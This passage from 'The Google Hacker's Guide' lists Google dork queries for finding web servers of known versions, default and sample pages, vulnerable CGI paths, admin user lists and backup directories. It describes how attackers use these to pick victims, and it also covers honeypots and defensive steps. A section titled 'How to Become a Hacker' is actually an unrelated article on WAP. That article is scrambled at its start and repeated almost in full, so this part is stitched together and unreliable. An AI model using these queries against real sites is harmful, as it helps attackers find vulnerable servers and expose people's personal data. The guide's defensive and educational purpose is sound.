Regardless of how likely it is to determine the web server version of a specific server
using this technique, hackers (especially web defacers) can use this technique to troll
Google for potential victims. If a hacker has an exploit that works against, say Apache
1.3.0, he can quickly scan Google for victims with a simple search like
‘intitle:index.of "Apache/1.3.0 Server at"’. This would return a list of
servers that have at least one directory listing with the Apache 1.3.0 server tag at the
bottom of the listing. This technique can be used for any web server that tags directory
listings with the server version, as long as the attacker knows in advance what that tag
might look like.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 19 -
via default pages
It is also possible to determine the version of a web server based on default pages.
When a web server is installed, it generally will ship with a set of default web pages, like
the Apache 1.2.6 page shown in Figure 10.
Figure 10: Apache test page
These pages can make it easy for a site administrator to get a web server running. By
providing a simple page to test, the administrator can simply connect to his own web
server with a browser to validate that the web server was installed correctly. Some
operating systems even come with web server software already installed. In this case,
an Internet user may not even realize that a web server is running on his machine. This
type of casual behavior on the part of an Internet user will lead an attacker to rightly
assume that the web server is not well maintained and is, by extension insecure. By
further extension, the attacker can also assume that the entire operating system of the
server may be vulnerable by virtue of poor maintenance.
How this technique can be used
A simple query of “intitle:Test.Page.for.Apache it.worked!" will return a list
of sites running Apache 1.2.6 with a default home page. Other queries will return similar
Apache results:
Apache server version Query
Apache 1.3.0 – 1.3.9 Intitle:Test.Page.for.Apache It.worked! this.web.site!
Apache 1.3.11 – 1.3.26 Intitle:Test.Page.for.Apache seeing.this.instead
Apache 2.0 Intitle:Simple.page.for.Apache Apache.Hook.Functions
Apache SSL/TLS Intitle:test.page "Hey, it worked !" "SSL/TLS-aware"
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 20 -
Microsoft’s Internet Information Services (IIS) also ships with default web pages as
shown in Figure 11.
Figure 11: IIS 5.0 default web page
Queries that will locate default IIS web pages include:
IIS Server Version Query
Many intitle:welcome.to intitle:internet IIS
Unknown intitle:"Under construction" "does not currently have"
IIS 4.0 intitle:welcome.to.IIS.4.0
IIS 4.0 allintitle:Welcome to Windows NT 4.0 Option Pack
IIS 4.0 allintitle:Welcome to Internet Information Server
IIS 5.0 allintitle:Welcome to Windows 2000 Internet Services
IIS 6.0 allintitle:Welcome to Windows XP Server Internet Services
In the case of Microsoft-based web servers, it is not only possible to determine web
server version, but operating system and server pack version as well. This information is
invaluable to an attacker bent on hacking not only the web server, but hacking beyond
the web server and into the operating system itself. In most cases, an attacker with
control of the operating system can wreak more havoc on a machine than a hacker that
only controls the web server.
Netscape Servers also ship with default pages as shown in Figure 12.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 21 -
Figure 12: Netscape Enterprise Server default page
Some queries that will locate default Netscape web pages include:
Netscape Server Version Query
Many allintitle:Netscape Enterprise Server Home Page
Unknown allintitle:Netscape FastTrack Server Home Page
Some queries to find more esoteric web servers/applications include:
Server / Version Query
Jigsaw / 2.2.3 intitle:"jigsaw overview" "this is your"
Jigsaw / Many intitle:”jigsaw overview”
iPlanet / Many intitle:"web server, enterprise edition"
Resin / Many allintitle:Resin Default Home Page
Resin / Enterprise allintitle:Resin-Enterprise Default Home Page
JWS / 1.0.3 – 2.0 allintitle:default home page java web server
J2EE / Many intitle:"default j2ee home page"
KFSensor honeypot "KF Web Server Home Page"
Kwiki "Congratulations! You've created a new Kwiki website."
Matrix Appliance "Welcome to your domain web page" matrix
HP appliance sa1* intitle:"default domain page" "congratulations" "hp web"
Intel Netstructure "congratulations on choosing" intel netstructure
Generic Appliance "default web page" congratulations "hosting appliance"
Debian Apache intitle:"Welcome to Your New Home Page!" debian
Cisco Micro
Webserver 200
"micro webserver home page"
via manuals, help pages and sample programs
Another method of determining server version involves searching for manuals, help
pages or sample programs which may be installed on the website by default. Many web
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 22 -
server distributions install manual pages and sample programs in default locations. Over
the years, hackers have found many ways to exploit these default web applications to
gain privileged access to the web server. Because of this, most web server vendors
insist that administrators remove this sample code before placing a server on the
Internet. Regardless of the potential vulnerability of such programs, the mere existence
of these programs can help determine the web server type and version. Google can
stumble on these directories via a default-installed webpage or other means.
How this technique can be used
In addition to determining the web server version of a specific target, hackers can use
this technique to find vulnerable targets.
Example:
inurl:manual apache directives modules
This query returns pages that host the Apache web server manuals. The Apache
manuals are included in the default installation package of many different versions of
Apache. Different versions of Apache may have different styles of manual, and the
location of manuals may differ, if they are installed at all. As evidenced in Figure 13, the
server version is reported at the top of the manual page. This may not reflect the current
version of the web server if the server has been upgraded since the original installation.
Figure 13: Determining server version via server manuals
Microsoft’s IIS often deploy manuals (termed ‘help pages’) with various versions of their
web server. One way to search for these default help pages is with a query like
‘allinurl:iishelp core’.
Many versions of IIS optionally install sample applications. Many times, these sample
applications are included in a directory called ‘iissamples,’ which may be discovered
using a query like ‘inurl:iissamples’. In addition, the names of a sample program
can be included in the query such as ‘inurl:iissamples advquery.asp’ as shown
in Figure 14.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 23 -
Figure 14: An IIS server with default sample code installed
Many times, subdirectories may exist inside the samples directory. A page with both the
‘iissamples’ directory and the ‘sdk’ directory can be found with a query like
‘inurl:iissamples sdk’.
There are many more combinations of default manual, help pages and sample programs
that can be searched for. As mentioned above, these programs often contain
vulnerabilities. Searching for vulnerable programs is yet another trick of the Google
hacker.
Using Google as a CGI scanner
The ‘CGI scanner’ or ‘web scanner’ has become one of the most indispensable tools in
the world of web server hacking. Mercilessly searching out vulnerable programs on a
server, these programs help pinpoint potential avenues for attack. These programs are
brutally obvious, incredibly noisy and fairly accurate tools. However, the accomplished
Google hacker knows there are more subtle and interesting ways to attempt the same
task.
In order to accomplish its task, these scanners must know what exactly to search for on
a web server. In most cases these tools are scanning web servers looking for
vulnerable files or directories that may contain sample code or vulnerable files. Either
way, the tools generally store these vulnerabilities in a file that is formatted like the
following except:
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 24 -
/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi
/iissamples/ISSamples/SQLQHit.asp
/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi
How this technique can be used
The lines in a vulnerability file like the one shown above can serve as a roadmap for a
Google hacker. Each line can be broken down and used in either an ‘index.of’ or an
‘inurl’ search to find vulnerable targets. For example, a Google search for
‘allinurl:/random_banner/index.cgi’ returns the results shown in Figure 15.
Figure 15: Example search using a line from a CGI scanner
A hacker can take sites returned from this Google search, apply a bit of hacker ‘magic’
and eventually get the broken ‘random_banner’ program to cough up any file on that
web server, including the password file as shown in Figure 16.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 25 -
Figure 16: password file captured from a vulnerable site found using a Google search
Of the many Google hacking techniques we’ve looked at, this technique is one of the
best candidates for automation since the CGI scanner vulnerability files can be very
large. The gooscan tool, written by j0hnny performs this and many other functions.
Gooscan and automation is discussed later.
Using Google to find interesting files and directories
Using Google to find vulnerable targets can be very rewarding. However, it is often more
rewarding to find not only vulnerabilities but to find sensitive data that is not meant for
public viewing. People and organizations leave this type of data on web servers all the
time (trust me, I’ve found quite a bit of it). Now remember, Google is only crawling a
small percentage of the pages that contain this type of data, but the tradeoff is that
Google’s data can be retrieved from Google quickly, quietly and without much fuss.
It is not uncommon to find sensitive data such as financial information, social security
numbers, medical information, and the like.
How this technique can be used
Of all the techniques examined this far, this technique is the hardest to describe because
it takes a bit of imagination and sometimes just a bit of luck. Often the best way to find
sensitive files and directories is to find them in the context of other “important” words and
phrases.
Example:
Consider the fact that many people store an entire hodgepodge of data inside backup
directories. Often times, the entire content of a web server or personal computer can be
found in a directory called backup. Using a simple query like “inurl:backup” can
yield potential backup directories, yet refining the search to something like
“inurl:backup intitle:index.of inurl:admin” can reveal even more
relevant results.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 26 -
A query like “inurl:admin” can often reveal administrative directories. Several
combinations of this query are often fruitful. For example:
“inurl:admin intitle:login” can reveal admin login pages
“inurl:admin filetype:xls” can reveal interesting Excel spreadsheets either
named “admin” or stored in a directory named “admin”. Educational institutions are
notorious for falling victim to this search.
“inurl:admin inurl:userlist” is a generic catch-all query which finds many
different types of administrative userlist pages. These results may take some sorting
through, but the benefits are certainly worth it, as results range from usernames,
passwords, phone numbers, addresses, etc.
“inurl:admin filetype:asp inurl:userlist” will find more specific examples
of an administrator’s user list function, this time written in an ASP page. In most cases,
these types of pages do not require authentication.
About Google automated scanning
With so many potential search combinations available, it’s obvious that an automated
tool scanning for a known list of potentially dangerous pages would be extremely useful.
However, Google frowns on such automation as quoted at
http://www.google.com/terms_of_service.html:
“You may not send automated queries of any sort to Google's system without
express permission in advance from Google. Note that "sending automated
queries" includes, among other things:
• using any software which sends queries to Google to determine how a
website or webpage "ranks" on Google for various queries;
• "meta-searching" Google; and
• performing "offline" searches on Google.”
Google does offer alternatives to this policy in the form of the Google Web API’s found at
http://www.google.com/apis/. There are several major drawbacks to the Google API
program at the time of this writing. First, users and developers of Google API programs
must both have Google license keys. This puts a damper on the potential user base of
Google API programs. Secondly, API-created programs are limited to 1,000 queries per
day since “The Google Web APIs service is an experimental free program, so the
resources available to support the program are limited.” (according to the API FAQ found
at http://www.google.com/apis/api_faq.html#gen12.) With so many potential searches,
1000 queries is simply not enough.
The bottom line is that any user running an automated Google querying tool (with the
exception of API created tools) must obtain express permission in advance to do so. It is
unknown what the consequences of ignoring these terms of service are, but it seems
best to stay on Google’s good side.
The only exception to this rule appears to be the Google search appliance (described
below). The Google search appliance does not have the same automated query
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 27 -
restrictions since the end user, not Google, owns the appliance. One should, however,
obtain advance express permission from the owner or maintainer of the Google
appliance before searching it with any automated tool for various legal and moral
reasons.
Other Google stuff
Google Appliances
The Google search appliance is described at http://www.google.com/appliance/:
“Now the same reliable results you expect from Google web search can be yours
on your corporate website with the Google Search Appliance. This combined
hardware and software solution is easy to use, simple to deploy, and can be up
and running on your intranet and public website in just a few short hours.”
The Google appliance can best be described as a locally controlled and operated mini-
Google search engines for individuals and corporations. When querying a Google
appliance, often times the queries listed above in the “URL Syntax” section will not work.
Extra parameters are often required to perform a manual appliance query. Consider
running a search for "Steve Hansen" at the Google appliance found at Stanford. After
entering this search into the Stanford search page, the user is whisked away to a page
with this URL (chopped for readability):
http://find.stanford.edu/search?q=steve+hansen
&site=stanford&client=stanford&proxystylesheet=stanford
&output=xml_no_dtd&as_dt=i&as_sitesearch=
Breaking this up into chunks reveals three distinct pieces. First, the target appliance is
find.stanford.edu. Next, the query is "steve hansen" or "steve+hansen" and
last but not least are all the extra parameters:
&site=stanford&client=stanford&proxystylesheet=stanford
&output=xml_no_dtd&as_dt=i&as_sitesearch=
These parameters may differ from appliance to appliance, but it has become clear that
there are several default parameters that are required from a default installation of the
Google appliance like the one found at find.stanford.edu.
Googledorks
The term “googledork” was coined by Johnny Long (http://johnny.ihackstuff.com) and
originally meant “An inept or foolish person as revealed by Google.” After a great deal of
media attention, the term came to describe those “who troll the Internet for confidential
goods.” Either term is fine, really. What matters is that the term googledork conveys the
concept that sensitive stuff is on the web, and Google can help you find it. The official
googledorks page (found at http://johnny.ihackstuff.com/googledorks) lists many different
examples of unbelievable things that have been dug up through Google by the
maintainer of the page, Johnny Long. Each listing shows the Google search required to
find the information along with a description of why the data found on each page is so
interesting.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 28 -
Gooscan
Gooscan (http://johnny.ihackstuff.com) is a UNIX (Linux/BSD/Mac OS X) tool that
automates queries against Google search appliances, but with a twist. These particular
queries are designed to find potential vulnerabilities on web pages. Think "cgi scanner"
that never communicates directly with the target web server, since all queries are sent to
Google, not to the target. For the security professional, gooscan serves as a front-end
for an external server assessment and aids in the "information gathering" phase of a
vulnerability assessment. For the web server administrator, gooscan helps discover what
the web community may already know about a site thanks to Google.
Gooscan was not written using the Google API. This raises questions about the “legality”
of using gooscan as a Google scanner. Is gooscan “legal” to use? You should not use
this tool to query Google without advance express permission. Google appliances,
however, do not have these limitations. You should, however, obtain advance express
permission from the owner or maintainer of the Google appliance before searching it
with any automated tool for various legal and moral reasons. Only use this tool to
query appliances unless you are prepared to face the (as yet unquantified) wrath
of Google.
Although there are many features, the gooscan tool’s primary purpose is to scan Google
(as long as you obtain advance express permission from Google) or Google appliances
(as long as you have advance express permission from the owner/maintainer) for the
items listed on the googledorks page. In addition, the tool allows for a very thorough CGI
scan of a site through Google (as long as you obtain advance express permission from
Google) or a Google appliance (as long as you have advance express permission from
the owner/maintainer of the appliance). Have I made myself clear about how this tool is
intended to be used? Get permission! =) Once you have received the proper advance
express permission, gooscan makes it easy to measure the Google exposure of yourself
or your clients.
GooPot
The concept of a honeypot is very straightforward. According to techtarget.com:
“A honey pot is a computer system on the Internet that is expressly set up to
attract and ‘trap’ people who attempt to penetrate other people's computer
systems.”
In order to learn about how new attacks might be conducted, the maintainers of a
honeypot system monitor, dissect and catalog each attack, focusing on those attacks
which seem unique.
An extension of the classic honeypot system, a web-based honeypot or “pagepot” is
designed to attract those employing the techniques outlined in this paper. The concept is
fairly straightforward. A simple googledork entry like “inurl:admin
inurl:userlist” could easily be replicated with a web-based honeypot by creating
an index.html page which referenced another index.html file in an /admin/userlist
directory. If a web search engine like Google was instructed to crawl the top-level
index.html page, if would eventually find the link pointing to /admin/userlist/index.html.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 29 -
This link would satisfy the Google query of “inurl:admin inurl:userlist”
eventually attracting a curious Google searcher.
Once the Google searcher clicks on the Google, he is whisked away to the target web
page. In the background, the user’s web browser also sends many variables to that web
server, including one variable of interest, the “referrer” variable. This field contains the
complete name of the web page that was visited previously, or more clearly, the web site
that referred the user to the web page. The bottom line is that this variable can be
inspected to figure out how a web surfer found a web page assuming they clicked on
that link from a search engine page. This bit of information is critical to the maintainer of
a pagepot system, since it outlines the exact method the Google searcher used to locate
the pagepot system. The information aids in protecting other web sites from similar
queries.
The concept of a pagepot is not a new one thanks to many folks including the group at
http://www.gray-world.net/. Their web-based honeypot, hosted at http://www.grayworld.
net/etc/passwd/ is designed to entice those using Google like a CGI scanner. This
is not a bad concept, but as we’ve seen in this paper, there are so many other ways to
use Google to find vulnerable or sensitive pages.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 30 -
Enter GooPot, the Google honeypot system designed by johnny@ihackstuff.com. By
populating a web server with sensitive-looking documents and monitoring the referrer
variables passed to the server, a GooPot administrator can learn about new web search
techniques being employed in the wild and subsequently protect his site from similar
queries. Beyond a simple pagepot, GooPot uses enticements based on the many
techniques outlined in the googledorks collection and this document. In addition, the
GooPot more closely resembles the juicy targets that Google hackers typically go after.
Johnny Long, the administrator of the googledorks list, utilizes the GooPot to discover
new search types and publicize them in the form of googledorks listings, creating a selfsustaining
cycle for learning about, and protecting from search engine attacks.
Although the GooPot system is currently not publicly available, expect it to be made
available early 2Q 2004.
A word about how Google finds pages (Opera)
Although the concept of web crawling is fairly straightforward, Google has created other
methods for learning about new web pages. Most notably, Google has incorporated a
feature into the latest release of the Opera web browser. When an Opera user types a
URL into the address bar, the URL is sent to Google, and is subsequently crawled by
Google’s bots. According to the FAQ posted at http://www.opera.com/adsupport:
“The Google system serves advertisements and related searches to the Opera
browser through the Opera browser banner 468x60 format. Google determines
what ads and related searches are relevant based on the URL and content of the
page you are viewing and your IP address, which are sent to Google via the
Opera browser.”
As of the time of this writing it is unclear as to whether or not Google includes the link
into it’s search engine. However, testing shows that when an unindexed URL
(http://johnny.ihackstuff.com/temp/suck.html) was entered into Opera 7.2.3, a Googlebot
crawled the URL moments later as shown by the following access.log excerpts:
64.68.87.41 - "GET /robots.txt HTTP/1.0" 200 220 "-" "Mediapartners-
Google/2.1 (+http://www.googlebot.com/bot.html)"
64.68.87.41 - "GET /temp/suck.html HTTP/1.0" 200 5 "-" "Mediapartners-
Google/2.1 (+http://www.googlebot.com/bot.html)"
The privacy implications of this could be staggering, especially if you Opera users expect
visited URLs to remain private.
This feature can be turned off within Opera by selecting “Show generic selection of
graphical ads” from the “File -> Preferences -> Advertising” screen.
Protecting yourself from Google hackers
1. Keep your sensitive data off the web!
Even if you think you’re only putting your data on a web site temporarily, there’s a
good chance that you’ll either forget about it, or that a web crawler might find it.
Consider more secure ways of sharing sensitive data such as SSH/SCP or
encrypted email.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 31 -
2. Googledork!
• Use the techniques outlined in this paper to check your own site for
sensitive information or vulnerable files.
• Use gooscan from http://johnny.ihackstuff.com) to scan your site for bad
stuff, but first get advance express permission from Google! Without
advance express permission, Google could come after you for violating
their terms of service. The author is currently not aware of the exact
implications of such a violation. But why anger the “Goo-Gods”?!?
• Check the official googledorks website (http://johnny.ihackstuff.com) on a
regular basis to keep up on the latest tricks and techniques.
3. Consider removing your site from Google’s index.
The Google webmaster FAQ located at http://www.google.com/webmasters/
provides invaluable information about ways to properly protect and/or expose
your site to Google. From that page:
“Please have the webmaster for the page in question contact us with proof that
he/she is indeed the webmaster. This proof must be in the form of a root level
page on the site in question, requesting removal from Google. Once we receive
the URL that corresponds with this root level page, we will remove the offending
page from our index.”
In some cases, you may want to rome individual pages or snippets from Google’s
index. This is also a straightforward process which can be accomplished by
following the steps outlined at http://www.google.com/remove.html.
4. Use a robots.txt file.
Web crawlers are supposed to follow the robots exclusion standard found at
http://www.robotstxt.org/wc/norobots.html. This standard outlines the procedure
for “politely requesting” that web crawlers ignore all or part of your website. I
must note that hackers may not have any such scruples, as this file is certainly a
suggestion. The major search engine’s crawlers honor this file and it’s contents.
For examples and suggestions for using a robots.txt file, see the above URL on
robotstxt.org.
Thanks and shouts
First, I would like to thank God for the taking the time to pierce my way-logical mind with
the unfathomable gifts of sight by faith and eternal life through the sacrifice of Jesus
Christ.
Thanks to my family for putting up with the analog version of j0hnny.
Shouts to the STRIKEFORCE, “Gotta_Getta_Hotdog” Murray, “Re-Ron” Shaffer, “2 cute
to B single” K4yDub, “Nice BOOOOOSH” Arnold, “Skull Thicker than a Train Track”
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 32 -
Chapple, “Bitter Bagginz” Carter, Fosta’ (student=teacher;), Tiger “Lost my badge”
Woods, LARA “Shake n Bake” Croft, “BananaJack3t” Meyett, Patr1ckhacks, Czup, Mike
“Scan Master, Scan Faster” Walker, “Mr. I Love JAVA” Webster, “Soul Sistah” G Collins,
Chris, Carey, Matt, KLOWE, haywood, micah, Shouts to those who have passed on:
Chris, Ross, Sanguis, Chuck, Troy, Brad.
Shouts to Joe “BinPoPo”, Steve Williams (by far the most worthy defender I’ve had the
privilege of knowing) and to “Bigger is Better” Fr|tz.
Thanks to my website members for the (admittedly thin) stream of feedback and
Googledork additions. Maybe this document will spur more submissions.
Thanks to JeiAr at GulfTech Security
of Appdetective fame, and Mike “Supervillain” Carter for the outstanding contributions to
the googledorks database.
Thanks to Chris O'Ferrell (www.netsec.net), Yuki over at the Washington Post, Slashdot,
and TheRegister.co.uk for all the media coverage. While I’m thanking my referrers, I
should mention Scott Granneman for the front-page SecurityFocus article that was all
about Googledorking. He was nice enough to link me and call Googledorks his “favorite
site” for Google hacking even though he didn’t mention me by name or return any of my
emails. I’m not bitter though… it sure generated a lot of traffic! After all the good press,
it’s wonderful to be able to send out a big =PpPPpP to NewScientist Magazine for their
particularly crappy coverage of this topic. Just imagine, all this traffic could have been
yours if you had handled the story properly.
Shouts out to Seth Fogie, Anton Rager, Dan Kaminsky, rfp, Mike Schiffman, Dominique
Brezinski, Tan, Todd, Christopher (and the whole packetstorm crew), Bruce Potter,
Dragorn, and Muts (mutsonline, whitehat.co.il) and my long lost friend Topher.
Hello’s out to my good friends SNShields and Nathan.
When in Vegas, be sure to visit any of the world-class properties of the MGM/Mirage or
visit them online at http://mgmmirage.com. =)
HOW TO BECOME A HACKER
by Jeff Tyson
You and millions of other people around -- to communicate with
others, follow the stoc
the world use the Internet every day k market, keep up with the news, check the weather, shop, entertain yourself and learn. Staying connected has become to get away from your computer
make travel plans,
conduct business, so important
that it's hard and your Internet connection because you might miss
an e-mail message, an update on your stock or some news you need to knowl life growing more dependent on electronic communication overy to take the next step and get a device that allows you to access the
. With your business or
your persona the Internet, you might
be read Internet on the go.
A cell phone with wireless Internet
That's where wireless Internet comes in. You've probably seen news or advertising about cell phones and PDAs that let you receive and send e-mail. This seems a logical next step, but there are some questions that come up when you think about going mobile with the Internet. Will you still beable to surf the Web? How fast will you be able to get the information you need? You might have heard of the Wireless Application Protocol (WAP) and wonder how it works. In this edition of HowStuffWorks, you will learn just what WAP is, why it is needed and what devices use it.
The Cellular Explosion
Probably the most important factor in the birth of wireless Internet has been the proliferation of digital
cell phones in the last few years. The expanding network of digital cellular and personal
communication services (PCS) has created a solid foundation for wireless Internet services. It is
estimated that there are more than 50 million Web-enabled cell phones in use. In 1997, Nokia,
Motorola, Ericsson and Phone.com came together to create the WAP because they believed that a
universal standard is critical to the successful implementation of wireless Internet. Since then, more
than 350 companies have joined them in the WAP Forum.
A typical digital cell phone
Making a Web site accessible through a wireless device is quite a challenge. So far, only a small portion of the more than a billion Web sites provide any wireless Internet content. As the use of WAP-enabled devices grows, you can expect that many more Web sites will be interested in creating wireless content.
WAP is designed to work on any of the existing wireless services, using standards such as:
• Short Message Service (SMS)
• High-Speed Circuit-Switched Data (CSD)
• General Packet Radio Service (GPRS)
• Unstructured Supplementary Services Data (USSD)
For more information on these services, check out this page.
Wireless Markup Language WAP uses Wireless Markup Language (WML), which includes the Handheld Device Markup Language (HDML) developed by Phone.com.
WML can also trace its roots to eXtensible Markup Language (XML). A markup language is a way of adding information to your content that tells the device receiving the content what to do with it. The best known markup language is Hypertext Markup Language (HTML). Unlike HTML, WML is considered a meta language. Basically, this means that in addition to providing predefined tags, WML lets you design your own markup language components. WAP also allows the use of standard Internet protocols such as UDP, IP and XML.
There are three main reasons why wireless Internet needs the Wireless Application Protocol:
• Transfer speed
• Size and readability
• Navigation
Most cell phones and Web-enabled PDAs have data transfer rates of 14.4 Kbps or less. Compare this to a typical 56 Kbps modem, a cable modem or a DSL connection. Most Web pages today are full of graphics that would take an unbearably long time to download at 14.4 Kbps. Wireless Internet content is typically text-based in order to solve this problem. The main Amazon page for regular Internet The main Amazon page for wireless Internet
The relatively small size of the LCD on a cell phone or PDA presents another challenge. Most Web pages are designed for a resolution of 640x480 pixels, which is fine if you are reading on a desktop or a laptop. The page simply does not fit on a wireless device's display, which might be 150x150 pixels. Also, the majority of wireless devices use monochrome screens. Pages are harder to read when font and background colors become similar shades of gray.
Navigation is another issue. You make your way through a Web page with points and clicks using a mouse; but if you are using a wireless device, you often use one hand to scroll keys.
WAP takes each of these limitations into account and provides a way to work with a typical wireless device.
Wireless Application Protocol Here's what happens when you access a Web site using a WAP-enabled device:
• You turn on the device and open the minibrowser.
• The device sends out a radio signal, searching for service.
• A connection is made with your service provider.
• You select a Web site that you wish to view.
• A request is sent to a gateway server using WAP.
• The gateway server retrieves the information via HTTP from the Web site.
• The gateway server encodes the HTTP data as WML.
• The WML-encoded data is sent to your device.
• You see the wireless Internet version of the Web page you selected.
To create wireless Internet content, a Web site creates special text-only or low-graphics versions of the site. The data is sent in HTTP form by a Web server to a WAP gateway. This system includes the WAP encoder, script compiler and protocol adapters to convert the HTTP information to WML. The gateway then sends the converted data to the WAP client on your wireless device.
What happens between the gateway and the client relies on features of different parts of the WAP protocol stack. Let's take a look at each part of the stack: WAP protocol stack
• WAE - The Wireless Application Environment holds the tools that wireless Internet content developers use. These include WML and WMLScript, which is a scripting language used in conjunction with WML. It functions much like Javascript.
• WSP - The Wireless Session Protocol determines whether a session between the device and the network will be connection-oriented or connectionless. What this is basically talking about is whether or not the device needs to talk back and forth with the network during a session. In a connection-oriented session, data is passed both ways between the device and the network; WSP then sends the packet to the Wireless Transaction Protocol layer (see below). If the session is connectionless, commonly used when information is being broadcast or streamed from the network to the device, then WSP redirects the packet to the Wireless Datagram Protocol layer (see below).
• WTP - The Wireless Transaction Protocol acts like a traffic cop, keeping the data flowing in a logical and smooth manner. It also determines how to classify each transaction request:
􀂃 Reliable two-way
􀂃 Reliable one-way
􀂃 Unreliable one-way
The WSP and WTP layers correspond to Hypertext Transfer Protocol (HTTP) in the TCP/IP protocol suite.
• WTLS - Wireless Transport Layer Security provides many of the same security features found in the Transport Layer Security (TLS) part of TCP/IP. It checks data integrity, provides encryption and performs client and server authentication.
• WDP - The Wireless Datagram Protocol works in conjunction with the network carrier layer (see below). WDP makes it easy to adapt WAP to a variety of bearers because all that needs to change is the information maintained at this level.
• Network carriers - Also called bearers, these can be any of the existing technologies that wireless providers use, as long as information is provided at the WDP level to interface WAP with the bearer.
Once the information is received by the WAP client, it is passed to the minibrowser. This is a tiny application built into the wireless device that provides the interface between the user and the wireless Internet. Here's a look at the start page of a typical minibrowser: The minibrowser offers streamlined functionality.
The minibrowser does not offer anything more than basic navigation. Wireless Internet is still a long way from being a true alternative to the normal Internet. It is really positioned right now for people
the specifications of the WAP standard to ensure that it evolves in a timely and useful manner.
You and millions of other people around -- to communicate with
others, follow the stoc
the world use the Internet every day k market, keep up with the news, check the weather, shop, entertain yourself and learn. Staying connected has become to get away from your computer
make travel plans,
conduct business, so important
that it's hard and your Internet connection because you might miss
an e-mail message, an update on your stock or some news you need to knowl life growing more dependent on electronic communication overy to take the next step and get a device that allows you to access the
. With your business or
your persona the Internet, you might
be read Internet on the go.
A cell phone with wireless Internet
That's where wireless Internet comes in. You've probably seen news or advertising about cell phones and PDAs that let you receive and send e-mail. This seems a logical next step, but there are some questions that come up when you think about going mobile with the Internet. Will you still beable to surf the Web? How fast will you be able to get the information you need? You might have heard of the Wireless Application Protocol (WAP) and wonder how it works. In this edition of HowStuffWorks, you will learn just what WAP is, why it is needed and what devices use it.
The Cellular Explosion
Probably the most important factor in the birth of wireless Internet has been the proliferation of digital
cell phones in the last few years. The expanding network of digital cellular and personal
communication services (PCS) has created a solid foundation for wireless Internet services. It is
estimated that there are more than 50 million Web-enabled cell phones in use. In 1997, Nokia,
Motorola, Ericsson and Phone.com came together to create the WAP because they believed that a
universal standard is critical to the successful implementation of wireless Internet. Since then, more
than 350 companies have joined them in the WAP Forum.
A typical digital cell phone
Making a Web site accessible through a wireless device is quite a challenge. So far, only a small portion of the more than a billion Web sites provide any wireless Internet content. As the use of WAP-enabled devices grows, you can expect that many more Web sites will be interested in creating wireless content.
WAP is designed to work on any of the existing wireless services, using standards such as:
• Short Message Service (SMS)
• High-Speed Circuit-Switched Data (CSD)
• General Packet Radio Service (GPRS)
• Unstructured Supplementary Services Data (USSD)
For more information on these services, check out this page.
Wireless Markup Language WAP uses Wireless Markup Language (WML), which includes the Handheld Device Markup Language (HDML) developed by Phone.com.
WML can also trace its roots to eXtensible Markup Language (XML). A markup language is a way of adding information to your content that tells the device receiving the content what to do with it. The best known markup language is Hypertext Markup Language (HTML). Unlike HTML, WML is considered a meta language. Basically, this means that in addition to providing predefined tags, WML lets you design your own markup language components. WAP also allows the use of standard Internet protocols such as UDP, IP and XML.
There are three main reasons why wireless Internet needs the Wireless Application Protocol:
• Transfer speed
• Size and readability
• Navigation
Most cell phones and Web-enabled PDAs have data transfer rates of 14.4 Kbps or less. Compare this to a typical 56 Kbps modem, a cable modem or a DSL connection. Most Web pages today are full of graphics that would take an unbearably long time to download at 14.4 Kbps. Wireless Internet content is typically text-based in order to solve this problem. The main Amazon page for regular Internet The main Amazon page for wireless Internet
The relatively small size of the LCD on a cell phone or PDA presents another challenge. Most Web pages are designed for a resolution of 640x480 pixels, which is fine if you are reading on a desktop or a laptop. The page simply does not fit on a wireless device's display, which might be 150x150 pixels. Also, the majority of wireless devices use monochrome screens. Pages are harder to read when font and background colors become similar shades of gray.
Navigation is another issue. You make your way through a Web page with points and clicks using a mouse; but if you are using a wireless device, you often use one hand to scroll keys.
WAP takes each of these limitations into account and provides a way to work with a typical wireless device.
Wireless Application Protocol Here's what happens when you access a Web site using a WAP-enabled device:
• You turn on the device and open the minibrowser.
• The device sends out a radio signal, searching for service.
• A connection is made with your service provider.
• You select a Web site that you wish to view.
• A request is sent to a gateway server using WAP.
• The gateway server retrieves the information via HTTP from the Web site.
• The gateway server encodes the HTTP data as WML.
• The WML-encoded data is sent to your device.
• You see the wireless Internet version of the Web page you selected.
To create wireless Internet content, a Web site creates special text-only or low-graphics versions of the site. The data is sent in HTTP form by a Web server to a WAP gateway. This system includes the WAP encoder, script compiler and protocol adapters to convert the HTTP information to WML. The gateway then sends the converted data to the WAP client on your wireless device.
What happens between the gateway and the client relies on features of different parts of the WAP protocol stack. Let's take a look at each part of the stack: WAP protocol stack
• WAE - The Wireless Application Environment holds the tools that wireless Internet content developers use. These include WML and WMLScript, which is a scripting language used in conjunction with WML. It functions much like Javascript.
• WSP - The Wireless Session Protocol determines whether a session between the device and the network will be connection-oriented or connectionless. What this is basically talking about is whether or not the device needs to talk back and forth with the network during a session. In a connection-oriented session, data is passed both ways between the device and the network; WSP then sends the packet to the Wireless Transaction Protocol layer (see below). If the session is connectionless, commonly used when information is being broadcast or streamed from the network to the device, then WSP redirects the packet to the Wireless Datagram Protocol layer (see below).
